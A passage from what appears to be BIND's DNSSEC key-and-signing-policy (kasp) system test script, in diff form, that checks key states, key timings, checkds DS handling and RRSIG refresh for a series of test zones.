_wait_for_metadata "DSPublish: $now" "${basefile}.state" || log_error "bad DSPublish in ${basefile}.state" +# DS State should be forced into RUMOURED. +set_keystate "KEY1" "STATE_DS" "rumoured" +check_keys +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +n=$((n+1)) +echo_i "checkds withdraw correctly sets DSRemoved for zone $ZONE ($n)" +now=$(date +%Y%m%d%H%M%S) +rndc_checkds "$SERVER" "$DIR" "-" "$now" "withdrawn" "$ZONE" +retry_quiet 3 _wait_for_metadata "DSRemoved: $now" "${basefile}.state" || log_error "bad DSRemoved in ${basefile}.state" +# DS State should be forced into UNRETENTIVE. +set_keystate "KEY1" "STATE_DS" "unretentive" +check_keys +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# +# Zone: checkds-doubleksk.kasp. +# +key_clear "KEY1" +key_clear "KEY2" +key_clear "KEY3" +key_clear "KEY4" + +set_zone "checkds-doubleksk.kasp" +set_policy "checkds-doubleksk" "3" "303" +set_server "ns3" "10.53.0.3" +# Key properties. +set_keyrole "KEY1" "ksk" +set_keylifetime "KEY1" "0" +set_keyalgorithm "KEY1" "13" "ECDSAP256SHA256" "256" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "no" + +set_keyrole "KEY2" "ksk" +set_keylifetime "KEY2" "0" +set_keyalgorithm "KEY2" "13" "ECDSAP256SHA256" "256" +set_keysigning "KEY2" "yes" +set_zonesigning "KEY2" "no" + +set_keyrole "KEY3" "zsk" +set_keylifetime "KEY3" "0" +set_keyalgorithm "KEY3" "13" "ECDSAP256SHA256" "256" +set_keysigning "KEY3" "no" +set_zonesigning "KEY3" "yes" +# DNSKEY, RRSIG (ksk), RRSIG (zsk) are published. DS needs to wait. +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "rumoured" +set_keystate "KEY1" "STATE_KRRSIG" "rumoured" +set_keystate "KEY1" "STATE_DS" "hidden" + +set_keystate "KEY2" "GOAL" "omnipresent" +set_keystate "KEY2" "STATE_DNSKEY" "rumoured" +set_keystate "KEY2" "STATE_KRRSIG" "rumoured" +set_keystate "KEY2" "STATE_DS" "hidden" + +set_keystate "KEY3" "GOAL" "omnipresent" +set_keystate "KEY3" "STATE_DNSKEY" "rumoured" +set_keystate "KEY3" "STATE_ZRRSIG" "rumoured" + +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain +dnssec_verify + +basefile1=$(key_get KEY1 BASEFILE) +basefile2=$(key_get KEY2 BASEFILE) + +n=$((n+1)) +echo_i "checkds published does not set DSPublish for zone $ZONE (multiple KSK) ($n)" +rndc_checkds "$SERVER" "$DIR" "-" "20200102121314" "published" "$ZONE" +grep "DSPublish:" "${basefile1}.state" > /dev/null && log_error "DSPublish incorrectly set in ${basefile1}" +grep "DSPublish:" "${basefile2}.state" > /dev/null && log_error "DSPublish incorrectly set in ${basefile2}" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +n=$((n+1)) +echo_i "checkds withdrawn does not set DSRemoved for zone $ZONE (multiple KSK) ($n)" +rndc_checkds "$SERVER" "$DIR" "-" "20190102121314" "withdrawn" "$ZONE" +grep "DSRemoved:" "${basefile1}.state" > /dev/null && log_error "DSRemoved incorrectly set in ${basefile1}" +grep "DSRemoved:" "${basefile2}.state" > /dev/null && log_error "DSRemoved incorrectly set in ${basefile2}" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +n=$((n+1)) +echo_i "checkds published does not set DSPublish for zone $ZONE (wrong algorithm) ($n)" +rndccmd "$SERVER" dnssec -checkds -key $(key_get KEY1 ID) -alg 8 "published" "$ZONE" > rndc.dnssec.checkds.out.$ZONE.$n +grep "DSPublish:" "${basefile1}.state" > /dev/null && log_error "DSPublish incorrectly set in ${basefile1}" +grep "DSPublish:" "${basefile2}.state" > /dev/null && log_error "DSPublish incorrectly set in ${basefile2}" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +n=$((n+1)) +echo_i "checkds withdrawn does not set DSRemoved for zone $ZONE (wrong algorithm) ($n)" +rndccmd "$SERVER" dnssec -checkds -key $(key_get KEY1 ID) -alg RSASHA256 "withdrawn" "$ZONE" > rndc.dnssec.checkds.out.$ZONE.$n +grep "DSRemoved:" "${basefile1}.state" > /dev/null && log_error "DSRemoved incorrectly set in ${basefile1}" +grep "DSRemoved:" "${basefile2}.state" > /dev/null && log_error "DSRemoved incorrectly set in ${basefile2}" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +n=$((n+1)) +echo_i "checkds published -key correctly sets DSPublish for key $(key_get KEY1 ID) zone $ZONE (multiple KSK) ($n)" +rndc_checkds "$SERVER" "$DIR" KEY1 "20190102121314" "published" "$ZONE" +retry_quiet 3 _wait_for_metadata "DSPublish: 20190102121314" "${basefile1}.state" || log_error "bad DSPublish in ${basefile1}.state" +grep "DSPublish:" "${basefile2}.state" > /dev/null && log_error "DSPublish incorrectly set in ${basefile2}" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +n=$((n+1)) +echo_i "checkds withdrawn -key correctly sets DSRemoved for key $(key_get KEY2 ID) zone $ZONE (multiple KSK) ($n)" +rndc_checkds "$SERVER" "$DIR" KEY2 "20200102121314" "withdrawn" "$ZONE" +grep "DSRemoved:" "${basefile1}.state" > /dev/null && log_error "DSPublish incorrectly set in ${basefile1}" +retry_quiet 3 _wait_for_metadata "DSRemoved: 20200102121314" "${basefile2}.state" || log_error "bad DSRemoved in ${basefile2}.state" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# +# Zone: checkds-csk.kasp. +# +key_clear "KEY1" +key_clear "KEY2" +key_clear "KEY3" +key_clear "KEY4" + +set_zone "checkds-csk.kasp" +set_policy "checkds-csk" "1" "303" +set_server "ns3" "10.53.0.3" +# Key properties. +set_keyrole "KEY1" "csk" +set_keylifetime "KEY1" "0" +set_keyalgorithm "KEY1" "13" "ECDSAP256SHA256" "256" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "yes" +# DNSKEY, RRSIG (ksk), RRSIG (zsk) are published. DS needs to wait. +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "rumoured" +set_keystate "KEY1" "STATE_KRRSIG" "rumoured" +set_keystate "KEY1" "STATE_ZRRSIG" "rumoured" +set_keystate "KEY1" "STATE_DS" "hidden" + +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain +dnssec_verify + +basefile=$(key_get KEY1 BASEFILE) + +n=$((n+1)) +echo_i "checkds publish correctly sets DSPublish for zone $ZONE ($n)" +rndc_checkds "$SERVER" "$DIR" "-" "20190102121314" "published" "$ZONE" +retry_quiet 3 _wait_for_metadata "DSPublish: 20190102121314" "${basefile}.state" || log_error "bad DSPublish in ${basefile}.state" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +n=$((n+1)) +echo_i "checkds withdraw correctly sets DSRemoved for zone $ZONE ($n)" +rndc_checkds "$SERVER" "$DIR" "-" "20200102121314" "withdrawn" "$ZONE" +retry_quiet 3 _wait_for_metadata "DSRemoved: 20200102121314" "${basefile}.state" || log_error "bad DSRemoved in ${basefile}.state" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Set keytimes for dnssec-policy with various algorithms. +# These all use the same time values. +set_keytimes_algorithm_policy() { + # The first KSK is immediately published and activated. + created=$(key_get KEY1 CREATED) + set_keytime "KEY1" "PUBLISHED" "${created}" + set_keytime "KEY1" "ACTIVE" "${created}" + # Key was pregenerated. + if [ "$1" = "pregenerated" ]; then + keyfile=$(key_get KEY1 BASEFILE) + grep "; Publish:" "${keyfile}.key" > published.test${n}.key1 + published=$(awk '{print $3}' < published.test${n}.key1) + set_keytime "KEY1" "PUBLISHED" "${published}" + set_keytime "KEY1" "ACTIVE" "${published}" + fi + published=$(key_get KEY1 PUBLISHED) + + # The DS can be published if the DNSKEY and RRSIG records are + # OMNIPRESENT. This happens after max-zone-ttl (1d) plus + # publish-safety (1h) plus zone-propagation-delay (300s) = + # 86400 + 3600 + 300 = 90300. + set_addkeytime "KEY1" "SYNCPUBLISH" "${published}" 90300 + # Key lifetime is 10 years, 315360000 seconds. + set_addkeytime "KEY1" "RETIRED" "${published}" 315360000 + # The key is removed after the retire time plus DS TTL (1d), + # parent propagation delay (1h), and retire safety (1h) = + # 86400 + 3600 + 3600 = 93600. + retired=$(key_get KEY1 RETIRED) + set_addkeytime "KEY1" "REMOVED" "${retired}" 93600 + + # The first ZSKs are immediately published and activated. + created=$(key_get KEY2 CREATED) + set_keytime "KEY2" "PUBLISHED" "${created}" + set_keytime "KEY2" "ACTIVE" "${created}" + # Key was pregenerated. + if [ "$1" = "pregenerated" ]; then + keyfile=$(key_get KEY2 BASEFILE) + grep "; Publish:" "${keyfile}.key" > published.test${n}.key2 + published=$(awk '{print $3}' < published.test${n}.key2) + set_keytime "KEY2" "PUBLISHED" "${published}" + set_keytime "KEY2" "ACTIVE" "${published}" + fi + published=$(key_get KEY2 PUBLISHED) + + # Key lifetime for KSK2 is 5 years, 157680000 seconds. + set_addkeytime "KEY2" "RETIRED" "${published}" 157680000 + # The key is removed after the retire time plus max zone ttl (1d), zone + # propagation delay (300s), retire safety (1h), and sign delay + # (signature validity minus refresh, 9d) = + # 86400 + 300 + 3600 + 777600 = 867900. + retired=$(key_get KEY2 RETIRED) + set_addkeytime "KEY2" "REMOVED" "${retired}" 867900 + + # Second ZSK (KEY3). + created=$(key_get KEY3 CREATED) + set_keytime "KEY3" "PUBLISHED" "${created}" + set_keytime "KEY3" "ACTIVE" "${created}" + # Key was pregenerated. + if [ "$1" = "pregenerated" ]; then + keyfile=$(key_get KEY3 BASEFILE) + grep "; Publish:" "${keyfile}.key" > published.test${n}.key3 + published=$(awk '{print $3}' < published.test${n}.key3) + set_keytime "KEY3" "PUBLISHED" "${published}" + set_keytime "KEY3" "ACTIVE" "${published}" + fi + published=$(key_get KEY3 PUBLISHED) + + # Key lifetime for KSK3 is 1 year, 31536000 seconds. + set_addkeytime "KEY3" "RETIRED" "${published}" 31536000 + retired=$(key_get KEY3 RETIRED) + set_addkeytime "KEY3" "REMOVED" "${retired}" 867900 +} + +# +# Zone: rsasha1.kasp. +# +if $SHELL ../testcrypto.sh -q RSASHA1 +then + set_zone "rsasha1.kasp" + set_policy "rsasha1" "3" "1234" + set_server "ns3" "10.53.0.3" + # Key properties. + key_clear "KEY1" + set_keyrole "KEY1" "ksk" + set_keylifetime "KEY1" "315360000" + set_keyalgorithm "KEY1" "5" "RSASHA1" "2048" + set_keysigning "KEY1" "yes" + set_zonesigning "KEY1" "no" + + key_clear "KEY2" + set_keyrole "KEY2" "zsk" + set_keylifetime "KEY2" "157680000" + set_keyalgorithm "KEY2" "5" "RSASHA1" "2048" + set_keysigning "KEY2" "no" + set_zonesigning "KEY2" "yes" + + key_clear "KEY3" + set_keyrole "KEY3" "zsk" + set_keylifetime "KEY3" "31536000" + set_keyalgorithm "KEY3" "5" "RSASHA1" "2000" + set_keysigning "KEY3" "no" + set_zonesigning "KEY3" "yes" + + # KSK: DNSKEY, RRSIG (ksk) published. DS needs to wait. + # ZSK: DNSKEY, RRSIG (zsk) published. + set_keystate "KEY1" "GOAL" "omnipresent" + set_keystate "KEY1" "STATE_DNSKEY" "rumoured" + set_keystate "KEY1" "STATE_KRRSIG" "rumoured" + set_keystate "KEY1" "STATE_DS" "hidden" + + set_keystate "KEY2" "GOAL" "omnipresent" + set_keystate "KEY2" "STATE_DNSKEY" "rumoured" + set_keystate "KEY2" "STATE_ZRRSIG" "rumoured" + + set_keystate "KEY3" "GOAL" "omnipresent" + set_keystate "KEY3" "STATE_DNSKEY" "rumoured" + set_keystate "KEY3" "STATE_ZRRSIG" "rumoured" + # Three keys only. + key_clear "KEY4" + + check_keys + check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + set_keytimes_algorithm_policy + check_keytimes + check_apex + check_subdomain + dnssec_verify +fi + +# +# Zone: unsigned.kasp. +# +set_zone "unsigned.kasp" +set_policy "none" "0" "0" +set_server "ns3" "10.53.0.3" + +key_clear "KEY1" +key_clear "KEY2" +key_clear "KEY3" +key_clear "KEY4" + +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain +# Make sure the zone file is untouched. +n=$((n+1)) +echo_i "Make sure the zonefile for zone ${ZONE} is not edited ($n)" +ret=0 +diff "${DIR}/${ZONE}.db.infile" "${DIR}/${ZONE}.db" || ret=1 +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# +# Zone: insecure.kasp. +# +set_zone "insecure.kasp" +set_policy "insecure" "0" "0" +set_server "ns3" "10.53.0.3" + +key_clear "KEY1" +key_clear "KEY2" +key_clear "KEY3" +key_clear "KEY4" + +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain + +# +# Zone: unlimited.kasp. +# +set_zone "unlimited.kasp" +set_policy "unlimited" "1" "1234" +set_server "ns3" "10.53.0.3" +# Key properties. +set_keyrole "KEY1" "csk" +set_keylifetime "KEY1" "0" +set_keyalgorithm "KEY1" "13" "ECDSAP256SHA256" "256" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "yes" +# DNSKEY, RRSIG (ksk), RRSIG (zsk) are published. DS needs to wait. +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "rumoured" +set_keystate "KEY1" "STATE_KRRSIG" "rumoured" +set_keystate "KEY1" "STATE_ZRRSIG" "rumoured" +set_keystate "KEY1" "STATE_DS" "hidden" + +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +set_keytimes_csk_policy +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# +# Zone: inherit.kasp. +# +set_zone "inherit.kasp" +set_policy "rsasha256" "3" "1234" +set_server "ns3" "10.53.0.3" + +# Key properties. +key_clear "KEY1" +set_keyrole "KEY1" "ksk" +set_keylifetime "KEY1" "315360000" +set_keyalgorithm "KEY1" "8" "RSASHA256" "2048" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "no" + +key_clear "KEY2" +set_keyrole "KEY2" "zsk" +set_keylifetime "KEY2" "157680000" +set_keyalgorithm "KEY2" "8" "RSASHA256" "2048" +set_keysigning "KEY2" "no" +set_zonesigning "KEY2" "yes" + +key_clear "KEY3" +set_keyrole "KEY3" "zsk" +set_keylifetime "KEY3" "31536000" +set_keyalgorithm "KEY3" "8" "RSASHA256" "3072" +set_keysigning "KEY3" "no" +set_zonesigning "KEY3" "yes" +# KSK: DNSKEY, RRSIG (ksk) published. DS needs to wait. +# ZSK: DNSKEY, RRSIG (zsk) published. +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "rumoured" +set_keystate "KEY1" "STATE_KRRSIG" "rumoured" +set_keystate "KEY1" "STATE_DS" "hidden" + +set_keystate "KEY2" "GOAL" "omnipresent" +set_keystate "KEY2" "STATE_DNSKEY" "rumoured" +set_keystate "KEY2" "STATE_ZRRSIG" "rumoured" + +set_keystate "KEY3" "GOAL" "omnipresent" +set_keystate "KEY3" "STATE_DNSKEY" "rumoured" +set_keystate "KEY3" "STATE_ZRRSIG" "rumoured" +# Three keys only. +key_clear "KEY4" + +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +set_keytimes_algorithm_policy +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# +# Zone: dnssec-keygen.kasp. +# +set_zone "dnssec-keygen.kasp" +set_policy "rsasha256" "3" "1234" +set_server "ns3" "10.53.0.3" +# Key properties, timings and states same as above. + +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +set_keytimes_algorithm_policy +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# +# Zone: some-keys.kasp. +# +set_zone "some-keys.kasp" +set_policy "rsasha256" "3" "1234" +set_server "ns3" "10.53.0.3" +# Key properties, timings and states same as above. + +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +set_keytimes_algorithm_policy "pregenerated" +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# +# Zone: pregenerated.kasp. +# +# There are more pregenerated keys than needed, hence the number of keys is +# six, not three. +set_zone "pregenerated.kasp" +set_policy "rsasha256" "6" "1234" +set_server "ns3" "10.53.0.3" +# Key properties, timings and states same as above. + +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +set_keytimes_algorithm_policy "pregenerated" +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# +# Zone: rumoured.kasp. +# +# There are three keys in rumoured state. +set_zone "rumoured.kasp" +set_policy "rsasha256" "3" "1234" +set_server "ns3" "10.53.0.3" +# Key properties, timings and states same as above. + +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +set_keytimes_algorithm_policy +# Activation date is a day later. +set_addkeytime "KEY1" "ACTIVE" $(key_get KEY1 ACTIVE) 86400 +set_addkeytime "KEY1" "RETIRED" $(key_get KEY1 RETIRED) 86400 +set_addkeytime "KEY1" "REMOVED" $(key_get KEY1 REMOVED) 86400 +set_addkeytime "KEY2" "ACTIVE" $(key_get KEY2 ACTIVE) 86400 +set_addkeytime "KEY2" "RETIRED" $(key_get KEY2 RETIRED) 86400 +set_addkeytime "KEY2" "REMOVED" $(key_get KEY2 REMOVED) 86400 +set_addkeytime "KEY3" "ACTIVE" $(key_get KEY3 ACTIVE) 86400 +set_addkeytime "KEY3" "RETIRED" $(key_get KEY3 RETIRED) 86400 +set_addkeytime "KEY3" "REMOVED" $(key_get KEY3 REMOVED) 86400 +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# +# Zone: secondary.kasp. +# +set_zone "secondary.kasp" +set_policy "rsasha256" "3" "1234" +set_server "ns3" "10.53.0.3" +# Key properties, timings and states same as above. + +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +set_keytimes_algorithm_policy +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Update zone. +n=$((n+1)) +echo_i "check that we correctly sign the zone after IXFR for zone ${ZONE} ($n)" +ret=0 +cp ns2/secondary.kasp.db.in2 ns2/secondary.kasp.db +rndccmd 10.53.0.2 reload "$ZONE" > /dev/null || log_error "rndc reload zone ${ZONE} failed" + +_wait_for_done_subdomains() { + ret=0 + dig_with_opts "a.${ZONE}" "@${SERVER}" A > "dig.out.$DIR.test$n.a" || return 1 + grep "status: NOERROR" "dig.out.$DIR.test$n.a" > /dev/null || return 1 + grep "a.${ZONE}\..*${DEFAULT_TTL}.*IN.*A.*10\.0\.0\.11" "dig.out.$DIR.test$n.a" > /dev/null || return 1 + check_signatures $_qtype "dig.out.$DIR.test$n.a" "ZSK" + if [ $ret -gt 0 ]; then return $ret; fi + + dig_with_opts "d.${ZONE}" "@${SERVER}" A > "dig.out.$DIR.test$n.d" || return 1 + grep "status: NOERROR" "dig.out.$DIR.test$n.d" > /dev/null || return 1 + grep "d.${ZONE}\..*${DEFAULT_TTL}.*IN.*A.*10\.0\.0\.4" "dig.out.$DIR.test$n.d" > /dev/null || return 1 + check_signatures $_qtype "dig.out.$DIR.test$n.d" "ZSK" + return $ret +} +retry_quiet 5 _wait_for_done_subdomains || ret=1 +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# TODO: we might want to test: +# - configuring a zone with too many active keys (should trigger retire). +# - configuring a zone with keys not matching the policy. + +# +# Zone: rsasha1-nsec3.kasp. +# +if $SHELL ../testcrypto.sh -q RSASHA1 +then + set_zone "rsasha1-nsec3.kasp" + set_policy "rsasha1-nsec3" "3" "1234" + set_server "ns3" "10.53.0.3" + # Key properties. + set_keyalgorithm "KEY1" "7" "NSEC3RSASHA1" "2048" + set_keyalgorithm "KEY2" "7" "NSEC3RSASHA1" "2048" + set_keyalgorithm "KEY3" "7" "NSEC3RSASHA1" "2000" + # Key timings and states same as above. + + check_keys + check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + set_keytimes_algorithm_policy + check_keytimes + check_apex + check_subdomain + dnssec_verify +fi + +# +# Zone: rsasha256.kasp. +# +set_zone "rsasha256.kasp" +set_policy "rsasha256" "3" "1234" +set_server "ns3" "10.53.0.3" +# Key properties. +set_keyalgorithm "KEY1" "8" "RSASHA256" "2048" +set_keyalgorithm "KEY2" "8" "RSASHA256" "2048" +set_keyalgorithm "KEY3" "8" "RSASHA256" "3072" +# Key timings and states same as above. + +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +set_keytimes_algorithm_policy +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# +# Zone: rsasha512.kasp. +# +set_zone "rsasha512.kasp" +set_policy "rsasha512" "3" "1234" +set_server "ns3" "10.53.0.3" +# Key properties. +set_keyalgorithm "KEY1" "10" "RSASHA512" "2048" +set_keyalgorithm "KEY2" "10" "RSASHA512" "2048" +set_keyalgorithm "KEY3" "10" "RSASHA512" "3072" +# Key timings and states same as above. + +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +set_keytimes_algorithm_policy +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# +# Zone: ecdsa256.kasp. +# +set_zone "ecdsa256.kasp" +set_policy "ecdsa256" "3" "1234" +set_server "ns3" "10.53.0.3" +# Key properties. +set_keyalgorithm "KEY1" "13" "ECDSAP256SHA256" "256" +set_keyalgorithm "KEY2" "13" "ECDSAP256SHA256" "256" +set_keyalgorithm "KEY3" "13" "ECDSAP256SHA256" "256" +# Key timings and states same as above. + +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +set_keytimes_algorithm_policy +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# +# Zone: ecdsa512.kasp. +# +set_zone "ecdsa384.kasp" +set_policy "ecdsa384" "3" "1234" +set_server "ns3" "10.53.0.3" +# Key properties. +set_keyalgorithm "KEY1" "14" "ECDSAP384SHA384" "384" +set_keyalgorithm "KEY2" "14" "ECDSAP384SHA384" "384" +set_keyalgorithm "KEY3" "14" "ECDSAP384SHA384" "384" +# Key timings and states same as above. + +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +set_keytimes_algorithm_policy +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# +# Zone: ed25519.kasp. +# +if [ -f ed25519-supported.file ]; then + set_zone "ed25519.kasp" + set_policy "ed25519" "3" "1234" + set_server "ns3" "10.53.0.3" + # Key properties. + set_keyalgorithm "KEY1" "15" "ED25519" "256" + set_keyalgorithm "KEY2" "15" "ED25519" "256" + set_keyalgorithm "KEY3" "15" "ED25519" "256" + # Key timings and states same as above. + + check_keys + check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + set_keytimes_algorithm_policy + check_keytimes + check_apex + check_subdomain + dnssec_verify +fi + +# +# Zone: ed448.kasp. +# +if [ -f ed448-supported.file ]; then + set_zone "ed448.kasp" + set_policy "ed448" "3" "1234" + set_server "ns3" "10.53.0.3" + # Key properties. + set_keyalgorithm "KEY1" "16" "ED448" "456" + set_keyalgorithm "KEY2" "16" "ED448" "456" + set_keyalgorithm "KEY3" "16" "ED448" "456" + # Key timings and states same as above. + + check_keys + check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + set_keytimes_algorithm_policy + check_keytimes + check_apex + check_subdomain + dnssec_verify +fi + +# Set key times for 'autosign' policy. +set_keytimes_autosign_policy() { + # The KSK was published six months ago (with settime). + created=$(key_get KEY1 CREATED) + set_addkeytime "KEY1" "PUBLISHED" "${created}" -15552000 + set_addkeytime "KEY1" "ACTIVE" "${created}" -15552000 + set_addkeytime "KEY1" "SYNCPUBLISH" "${created}" -15552000 + # Key lifetime is 2 years, 63072000 seconds. + active=$(key_get KEY1 ACTIVE) + set_addkeytime "KEY1" "RETIRED" "${active}" 63072000 + # The key is removed after the retire time plus DS TTL (1d), + # parent propagation delay (1h), retire safety (1h) = + # 86400 + 3600 + 3600 = 93600 + retired=$(key_get KEY1 RETIRED) + set_addkeytime "KEY1" "REMOVED" "${retired}" 93600 + + # The ZSK was published six months ago (with settime). + created=$(key_get KEY2 CREATED) + set_addkeytime "KEY2" "PUBLISHED" "${created}" -15552000 + set_addkeytime "KEY2" "ACTIVE" "${created}" -15552000 + # Key lifetime for KSK2 is 1 year, 31536000 seconds. + active=$(key_get KEY2 ACTIVE) + set_addkeytime "KEY2" "RETIRED" "${active}" 31536000 + # The key is removed after the retire time plus: + # TTLsig (RRSIG TTL): 1 day (86400 seconds) + # Dprp (propagation delay): 5 minutes (300 seconds) + # retire-safety: 1 hour (3600 seconds) + # Dsgn (sign delay): 7 days (604800 seconds) + # Iret: 695100 seconds. + retired=$(key_get KEY2 RETIRED) + set_addkeytime "KEY2" "REMOVED" "${retired}" 695100 +} + +# +# Zone: expired-sigs.autosign. +# +set_zone "expired-sigs.autosign" +set_policy "autosign" "2" "300" +set_server "ns3" "10.53.0.3" +# Key properties. +key_clear "KEY1" +set_keyrole "KEY1" "ksk" +set_keylifetime "KEY1" "63072000" +set_keyalgorithm "KEY1" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "no" + +key_clear "KEY2" +set_keyrole "KEY2" "zsk" +set_keylifetime "KEY2" "31536000" +set_keyalgorithm "KEY2" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" +set_keysigning "KEY2" "no" +set_zonesigning "KEY2" "yes" + +# Both KSK and ZSK stay OMNIPRESENT. +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY1" "STATE_KRRSIG" "omnipresent" +set_keystate "KEY1" "STATE_DS" "omnipresent" + +set_keystate "KEY2" "GOAL" "omnipresent" +set_keystate "KEY2" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY2" "STATE_ZRRSIG" "omnipresent" +# Expect only two keys. +key_clear "KEY3" +key_clear "KEY4" + +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +set_keytimes_autosign_policy +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Verify all signatures have been refreshed. +check_rrsig_refresh() { + # Apex. + _qtypes="DNSKEY SOA NS NSEC" + for _qtype in $_qtypes + do + n=$((n+1)) + echo_i "check ${_qtype} rrsig is refreshed correctly for zone ${ZONE} ($n)" + ret=0 + dig_with_opts "$ZONE" "@${SERVER}" "$_qtype" > "dig.out.$DIR.test$n" || log_error "dig ${ZONE} ${_qtype} failed" + grep "status: NOERROR" "dig.out.$DIR.test$n" > /dev/null || log_error "mismatch status in DNS response" + grep "${ZONE}\..*IN.*RRSIG.*${_qtype}.*${ZONE}" "dig.out.$DIR.test$n" > "rrsig.out.$ZONE.$_qtype" || log_error "missing RRSIG (${_qtype}) record in response" + # If this exact RRSIG is also in the zone file it is not refreshed. + _rrsig=$(cat "rrsig.out.$ZONE.$_qtype") + grep "${_rrsig}" "${DIR}/${ZONE}.db" > /dev/null && log_error "RRSIG (${_qtype}) not refreshed in zone ${ZONE}" + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) + done + + # Below apex. + _labels="a b c ns3" + for _label in $_labels; + do + _qtypes="A NSEC" + for _qtype in $_qtypes + do + n=$((n+1)) + echo_i "check ${_label} ${_qtype} rrsig is refreshed correctly for zone ${ZONE} ($n)" + ret=0 + dig_with_opts "${_label}.${ZONE}" "@${SERVER}" "$_qtype" > "dig.out.$DIR.test$n" || log_error "dig ${_label}.${ZONE} ${_qtype} failed" + grep "status: NOERROR" "dig.out.$DIR.test$n" > /dev/null || log_error "mismatch status in DNS response" + grep "${ZONE}\..*IN.*RRSIG.*${_qtype}.*${ZONE}" "dig.out.$DIR.test$n" > "rrsig.out.$ZONE.$_qtype" || log_error "missing RRSIG (${_qtype}) record in response" + _rrsig=$(cat "rrsig.out.$ZONE.$_qtype") + grep "${_rrsig}" "${DIR}/${ZONE}.db" > /dev/null && log_error "RRSIG (${_qtype}) not refreshed in zone ${ZONE}" + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) + done + done +} + +check_rrsig_refresh + +# +# Zone: fresh-sigs.autosign. +# +set_zone "fresh-sigs.autosign" +set_policy "autosign" "2" "300" +set_server "ns3" "10.53.0.3" +# Key properties, timings and states same as above. + +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +set_keytimes_autosign_policy +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Verify signature reuse. +check_rrsig_reuse() { + # Apex. + _qtypes="NS NSEC" + for _qtype in $_qtypes + do + n=$((n+1)) + echo_i "check ${_qtype} rrsig is reused correctly for zone ${ZONE} ($n)" + ret=0 + dig_with_opts "$ZONE" "@${SERVER}" "$_qtype" > "dig.out.$DIR.test$n" || log_error "dig ${ZONE} ${_qtype} failed" + grep "status: NOERROR" "dig.out.$DIR.test$n" > /dev/null || log_error "mismatch status in DNS response" + grep "${ZONE}\..*IN.*RRSIG.*${_qtype}.*${ZONE}" "dig.out.$DIR.test$n" > "rrsig.out.$ZONE.$_qtype" || log_error "missing RRSIG (${_qtype}) record in response" + # If this exact RRSIG is also in the signed zone file it is not refreshed. + _rrsig=$(awk '{print $5, $6, $7, $8, $9, $10, $11, $12, $13, $14;}' < "rrsig.out.$ZONE.$_qtype") + $CHECKZONE -f raw -F text -s full -o zone.out.${ZONE}.test$n "${ZONE}" "${DIR}/${ZONE}.db.signed" > /dev/null + grep "${_rrsig}" zone.out.${ZONE}.test$n > /dev/null || log_error "RRSIG (${_qtype}) not reused in zone 